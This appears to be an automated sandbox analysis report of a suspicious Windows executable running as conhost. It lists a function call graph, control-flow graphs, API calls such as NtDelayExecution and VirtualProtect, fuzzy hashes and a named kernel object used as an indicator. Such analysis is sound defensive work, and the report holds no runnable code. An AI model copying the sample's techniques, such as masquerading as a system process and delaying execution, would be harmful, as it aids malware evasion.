                                                                  callgraph 0 Function_00000001400058E1 1 Function_00000001400057E1 2 Function_0000000140001AE4 35 Function_0000000140001D40 2->35 76 Function_0000000140001BA0 2->76 3 Function_00000001400014E5 72 Function_0000000140001394 3->72 4 Function_0000000140005CF0 29 Function_0000000140005A30 4->29 5 Function_00000001400010F0 6 Function_00000001400030F1 7 Function_00000001400014F4 7->72 8 Function_0000000140001E00 9 Function_0000000140002F00 58 Function_0000000140001370 9->58 10 Function_0000000140001000 10->8 39 Function_0000000140001750 10->39 81 Function_0000000140001FB0 10->81 88 Function_0000000140001FC0 10->88 11 Function_0000000140001800 67 Function_0000000140002290 11->67 12 Function_0000000140002500 13 Function_0000000140005801 14 Function_0000000140005701 15 Function_0000000140001503 15->72 16 Function_0000000140001404 16->72 17 Function_0000000140002104 18 Function_0000000140001E10 19 Function_0000000140003110 20 Function_0000000140005A10 21 Function_0000000140001512 21->72 22 Function_0000000140002320 23 Function_0000000140002420 24 Function_0000000140001521 24->72 25 Function_0000000140005821 26 Function_0000000140001422 26->72 27 Function_0000000140001530 27->72 28 Function_0000000140003130 30 Function_0000000140001431 30->72 31 Function_0000000140005731 32 Function_000000014000153F 32->72 33 Function_0000000140001440 33->72 34 Function_0000000140005A40 34->29 35->67 36 Function_0000000140001140 51 Function_0000000140001160 36->51 37 Function_0000000140005841 38 Function_0000000140001F47 57 Function_0000000140001870 38->57 40 Function_0000000140003150 40->9 40->15 40->24 40->26 40->27 40->29 40->30 40->32 40->33 48 Function_000000014000145E 40->48 50 Function_0000000140002660 40->50 54 Function_000000014000156C 40->54 55 Function_000000014000146D 40->55 40->58 64 Function_000000014000157B 40->64 78 Function_00000001400015A8 40->78 79 Function_00000001400014A9 40->79 87 Function_00000001400016C0 40->87 97 Function_00000001400014D6 40->97 99 Function_00000001400026E0 40->99 41 Function_0000000140001650 42 Function_0000000140002050 43 Function_0000000140005850 44 Function_0000000140003051 45 Function_0000000140005751 46 Function_0000000140005951 47 Function_000000014000155D 47->72 48->72 49 Function_0000000140002460 51->40 51->51 51->57 65 Function_0000000140001880 51->65 66 Function_0000000140001F90 51->66 51->87 52 Function_0000000140001760 100 Function_00000001400020E0 52->100 53 Function_0000000140001E65 53->57 54->72 55->72 56 Function_000000014000216F 59 Function_0000000140001A70 59->35 59->76 60 Function_0000000140003070 61 Function_0000000140005771 62 Function_0000000140005871 63 Function_0000000140005971 64->72 65->23 65->35 65->50 65->76 68 Function_0000000140002590 69 Function_0000000140003090 70 Function_0000000140002691 71 Function_0000000140005791 72->4 72->34 73 Function_0000000140002194 73->57 74 Function_000000014000219E 75 Function_0000000140001FA0 76->35 80 Function_00000001400023B0 76->80 92 Function_00000001400024D0 76->92 77 Function_00000001400058A1 78->72 79->72 82 Function_00000001400022B0 83 Function_00000001400026B0 84 Function_00000001400030B1 85 Function_00000001400059B1 86 Function_0000000140001AB3 86->35 86->76 89 Function_00000001400057C1 90 Function_0000000140001AC3 90->35 90->76 91 Function_00000001400014C7 91->72 93 Function_00000001400017D0 94 Function_0000000140001FD0 95 Function_00000001400026D0 96 Function_0000000140001AD4 96->35 96->76 97->72 98 Function_00000001400022E0 99->3 99->7 99->15 99->21 99->29 99->47 99->48 99->50 99->58 99->79 99->91 101 Function_00000001400017E0 101->100

                                                                  Executed Functions

                                                                  Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • NtDelayExecution.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.4209503987.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000023.00000002.4209468886.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209527282.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209559604.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209578757.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: DelayExecution
                                                                  • String ID:
                                                                  • API String ID: 1249177460-0
                                                                  • Opcode ID: 3210746a9923182c7327b5e3e833e7d58ed368a322bb56d3eeddf1d7b1502087
                                                                  • Instruction ID: ea77cefef780fe59d28cb35e84be700af1ff747ec22ba00de631e0254e728e30
                                                                  • Opcode Fuzzy Hash: 3210746a9923182c7327b5e3e833e7d58ed368a322bb56d3eeddf1d7b1502087
                                                                  • Instruction Fuzzy Hash: C7F0A4B2608B408AEA11DB52F85179A77A1F38D7C0F005919BBC947735DB3CC150CB40

                                                                  Non-executed Functions

                                                                  Function 00000001400026E0 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 376COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 308 1400026e0-14000273b call 140002660 312 140002741-14000274b 308->312 313 14000280e-14000285e call 14000155d 308->313 315 140002774-14000277a 312->315 318 140002953-14000297b call 1400014c7 313->318 319 140002864-140002873 313->319 315->313 317 140002780-140002787 315->317 320 140002789-140002792 317->320 321 140002750-140002752 317->321 335 140002986-1400029c8 call 140001503 call 140005a30 318->335 336 14000297d 318->336 322 140002eb7-140002ef4 call 140001370 319->322 323 140002879-140002888 319->323 326 140002794-1400027ab 320->326 327 1400027f8-1400027fb 320->327 324 14000275a-14000276e 321->324 332 1400028e4-14000294e wcsncmp call 1400014e5 323->332 333 14000288a-1400028dd 323->333 324->313 324->315 330 1400027f5 326->330 331 1400027ad-1400027c2 326->331 327->324 330->327 337 1400027d0-1400027d7 331->337 332->318 333->332 346 140002e49-140002e84 call 140001370 335->346 347 1400029ce-1400029d5 335->347 336->335 339 1400027d9-1400027f3 337->339 340 140002800-140002809 337->340 339->330 339->337 340->324 350 1400029d7-140002a0c 346->350 354 140002e8a 346->354 349 140002a13-140002a43 wcscpy wcscat wcslen 347->349 347->350 352 140002a45-140002a76 wcslen 349->352 353 140002a78-140002aa5 349->353 350->349 355 140002aa8-140002abf wcslen 352->355 353->355 354->349 356 140002ac5-140002ad8 355->356 357 140002e8f-140002eab call 140001370 355->357 358 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 356->358 359 140002ada-140002aee 356->359 357->322 378 140002dfd-140002e1b call 140001512 358->378 379 140002e20-140002e48 call 14000145e 358->379 359->358 378->379
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.4209503987.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000023.00000002.4209468886.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209527282.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209559604.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209578757.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: wcslen$wcscatwcscpywcsncmp
                                                                  • String ID: 0$X$\BaseNamedObjects\apjuapcjhayoqqdtaiqiwnuw$`
                                                                  • API String ID: 597572034-2729595976
                                                                  • Opcode ID: 6d3c64ac2ea357c0a5b61e3601eb7ad5b86c86965fd9e469a58225b2c0d7551c
                                                                  • Instruction ID: f25b8d236e5ed2f4933913023d454351ab484624ba5bcdbbd352bca3d169ea7b
                                                                  • Opcode Fuzzy Hash: 6d3c64ac2ea357c0a5b61e3601eb7ad5b86c86965fd9e469a58225b2c0d7551c
                                                                  • Instruction Fuzzy Hash: DA1247B2608BC481E762CB16F8443EAB7A4F789794F414215EBA857BF5EF78C189C700
                                                                  Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.4209503987.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000023.00000002.4209468886.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209527282.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209559604.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209578757.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                  • String ID:
                                                                  • API String ID: 2643109117-0
                                                                  • Opcode ID: 14c80104db45f04c9cd9d24016d4d4c5cd86efcd8b03c73a3ef0435ab2a7c743
                                                                  • Instruction ID: d3d635c034e2ace449ccca4873d2abfe7504a33e0aec3559774c9c19de847b60
                                                                  • Opcode Fuzzy Hash: 14c80104db45f04c9cd9d24016d4d4c5cd86efcd8b03c73a3ef0435ab2a7c743
                                                                  • Instruction Fuzzy Hash: DE5113B1A11A4085FB16EF27F9947EA27A5BB8D7D0F449121FB4E873B6DE38C4958300
                                                                  Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 424 140001ba0-140001bc0 425 140001bc2-140001bd7 424->425 426 140001c09 424->426 427 140001be9-140001bf1 425->427 428 140001c0c-140001c17 call 1400023b0 426->428 429 140001bf3-140001c02 427->429 430 140001be0-140001be7 427->430 435 140001cf4-140001cfe call 140001d40 428->435 436 140001c1d-140001c6c call 1400024d0 VirtualQuery 428->436 429->430 432 140001c04 429->432 430->427 430->428 434 140001cd7-140001cf3 memcpy 432->434 440 140001d03-140001d1e call 140001d40 435->440 436->440 441 140001c72-140001c79 436->441 443 140001d23-140001d38 GetLastError call 140001d40 440->443 444 140001c7b-140001c7e 441->444 445 140001c8e-140001c97 441->445 447 140001cd1 444->447 448 140001c80-140001c83 444->448 449 140001ca4-140001ccf VirtualProtect 445->449 450 140001c99-140001c9c 445->450 447->434 448->447 452 140001c85-140001c8a 448->452 449->443 449->447 450->447 453 140001c9e 450->453 452->447 454 140001c8c 452->454 453->449 454->453
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                  • memcpy.MSVCRT ref: 0000000140001CE0
                                                                  • GetLastError.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.4209503987.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000023.00000002.4209468886.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209527282.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209559604.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209578757.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                  • API String ID: 2595394609-2123141913
                                                                  • Opcode ID: 93ac8dcbe28fb5ed14e4fc1c9fcb0d521b65e865588380c125eceea53853d859
                                                                  • Instruction ID: b11b68c805dc1d775e406fc4762d143c9136bcd1c990b12f6602ac898b7d07a9
                                                                  • Opcode Fuzzy Hash: 93ac8dcbe28fb5ed14e4fc1c9fcb0d521b65e865588380c125eceea53853d859
                                                                  • Instruction Fuzzy Hash: 4F4143F1601A4586FA26DF47F884BE927A0E78DBC4F554126EF0E877B1DA38C586C700
                                                                  Function 0000000140002104 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 455 140002104-14000210b 456 140002111-140002128 EnterCriticalSection 455->456 457 140002218-140002221 455->457 458 14000220b-140002212 LeaveCriticalSection 456->458 459 14000212e-14000213c 456->459 460 140002272-140002280 457->460 461 140002223-14000222d 457->461 458->457 462 14000214d-140002159 TlsGetValue GetLastError 459->462 463 140002241-140002263 DeleteCriticalSection 461->463 464 14000222f 461->464 466 14000215b-14000215e 462->466 467 140002140-140002147 462->467 463->460 465 140002230-14000223f 464->465 465->463 466->467 468 140002160-14000216d 466->468 467->458 467->462 468->467
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.4209503987.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000023.00000002.4209468886.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209527282.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209559604.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209578757.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                                  • String ID:
                                                                  • API String ID: 926137887-0
                                                                  • Opcode ID: 02dbac1ae92357609f4b8c89d713a412b6c8c97b3527304cd21e8be1c69a91a2
                                                                  • Instruction ID: c0e6f3c9640eef52c2cf5e528612c39f7eff26e03b764db1fbee3e18b15c28ca
                                                                  • Opcode Fuzzy Hash: 02dbac1ae92357609f4b8c89d713a412b6c8c97b3527304cd21e8be1c69a91a2
                                                                  • Instruction Fuzzy Hash: 1D21E3B1715A0292FA5BDB53F9483E923A0B76CBD0F444021FB1E576B4DF7A8986C300
                                                                  Function 0000000140001E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 471 140001e10-140001e2d 472 140001e3e-140001e48 471->472 473 140001e2f-140001e38 471->473 475 140001ea3-140001ea8 472->475 476 140001e4a-140001e53 472->476 473->472 474 140001f60-140001f69 473->474 475->474 479 140001eae-140001eb3 475->479 477 140001e55-140001e60 476->477 478 140001ecc-140001ed1 476->478 477->475 480 140001f23-140001f2d 478->480 481 140001ed3-140001ee2 signal 478->481 482 140001eb5-140001eba 479->482 483 140001efb-140001f0a call 140005fe0 479->483 486 140001f43-140001f45 480->486 487 140001f2f-140001f3f 480->487 481->480 484 140001ee4-140001ee8 481->484 482->474 488 140001ec0 482->488 483->480 492 140001f0c-140001f10 483->492 489 140001eea-140001ef9 signal 484->489 490 140001f4e-140001f53 484->490 486->474 487->486 488->480 489->474 493 140001f5a 490->493 494 140001f12-140001f21 signal 492->494 495 140001f55 492->495 493->474 494->474 495->493
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.4209503987.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000023.00000002.4209468886.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209527282.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209559604.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209578757.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CCG
                                                                  • API String ID: 0-1584390748
                                                                  • Opcode ID: 5280163379377ca6e44e0c5d2c698eb6079499830711fbae46cc424a6ca625e0
                                                                  • Instruction ID: a59ecfcda80627e887a2afd302da497d78ca087d7541c475695dc2e3193e6173
                                                                  • Opcode Fuzzy Hash: 5280163379377ca6e44e0c5d2c698eb6079499830711fbae46cc424a6ca625e0
                                                                  • Instruction Fuzzy Hash: 052159B1A0110642FA77DA1BB5943FA1182ABCD7E4F258635FF19473F9DE7C88828241
                                                                  Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 496 140001880-14000189c 497 1400018a2-1400018f9 call 140002420 call 140002660 496->497 498 140001a0f-140001a1f 496->498 497->498 503 1400018ff-140001910 497->503 504 140001912-14000191c 503->504 505 14000193e-140001941 503->505 507 14000194d-140001954 504->507 508 14000191e-140001929 504->508 506 140001943-140001947 505->506 505->507 506->507 510 140001a20-140001a26 506->510 511 140001956-140001961 507->511 512 14000199e-1400019a6 507->512 508->507 509 14000192b-14000193a 508->509 509->505 515 140001b87-140001b98 call 140001d40 510->515 516 140001a2c-140001a37 510->516 513 140001970-14000199c call 140001ba0 511->513 512->498 514 1400019a8-1400019c1 512->514 513->512 520 1400019df-1400019e7 514->520 516->512 517 140001a3d-140001a5f 516->517 521 140001a7d-140001a97 517->521 524 1400019e9-140001a0d VirtualProtect 520->524 525 1400019d0-1400019dd 520->525 526 140001b74-140001b82 call 140001d40 521->526 527 140001a9d-140001afa 521->527 524->525 525->498 525->520 526->515 533 140001b22-140001b26 527->533 534 140001afc-140001b0e 527->534 537 140001b2c-140001b30 533->537 538 140001a70-140001a77 533->538 535 140001b5c-140001b6c 534->535 536 140001b10-140001b20 534->536 535->526 539 140001b6f call 140001d40 535->539 536->533 536->535 537->538 540 140001b36-140001b57 call 140001ba0 537->540 538->512 538->521 539->526 540->535
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.4209503987.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000023.00000002.4209468886.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209527282.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209559604.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209578757.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                  • API String ID: 544645111-395989641
                                                                  • Opcode ID: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                                  • Instruction ID: bed1886f8e7b3562c786f91e2c2504e2a336d35a61311b426e06807153cec951
                                                                  • Opcode Fuzzy Hash: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                                  • Instruction Fuzzy Hash: 415114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700
                                                                  Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 544 140001800-140001810 545 140001812-140001822 544->545 546 140001824 544->546 547 14000182b-140001867 call 140002290 fprintf 545->547 546->547
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.4209503987.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000023.00000002.4209468886.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209527282.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209559604.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209578757.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-3474627141
                                                                  • Opcode ID: b5717ce3617b469f524d5a4a977c465a2e3941e764333e1ecdac5e330ef02b4f
                                                                  • Instruction ID: 22fde9f0a61d81c45d0352baa9b4897200fbcb7987813caf25585494093de0dd
                                                                  • Opcode Fuzzy Hash: b5717ce3617b469f524d5a4a977c465a2e3941e764333e1ecdac5e330ef02b4f
                                                                  • Instruction Fuzzy Hash: 4BF09671A14A4482E612EF6AB9417ED6360E75D7C1F50D211FF4D576A5DF3CD182C310
                                                                  Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 550 14000219e-1400021a5 551 140002272-140002280 550->551 552 1400021ab-1400021c2 EnterCriticalSection 550->552 553 140002265-14000226c LeaveCriticalSection 552->553 554 1400021c8-1400021d6 552->554 553->551 555 1400021e9-1400021f5 TlsGetValue GetLastError 554->555 556 1400021f7-1400021fa 555->556 557 1400021e0-1400021e7 555->557 556->557 558 1400021fc-140002209 556->558 557->553 557->555 558->557
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.4209503987.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000023.00000002.4209468886.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209527282.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209559604.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000023.00000002.4209578757.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                  • String ID:
                                                                  • API String ID: 682475483-0
                                                                  • Opcode ID: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                                  • Instruction ID: 8e08899b71d5d6c295770fc95a4fa8b22c720a8a39741bac27afb53efd3d8dea
                                                                  • Opcode Fuzzy Hash: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                                  • Instruction Fuzzy Hash: C201B2B5705A0192FA5BDB53FE083E86360B76CBD1F454061EF0957AB4DF79C996C200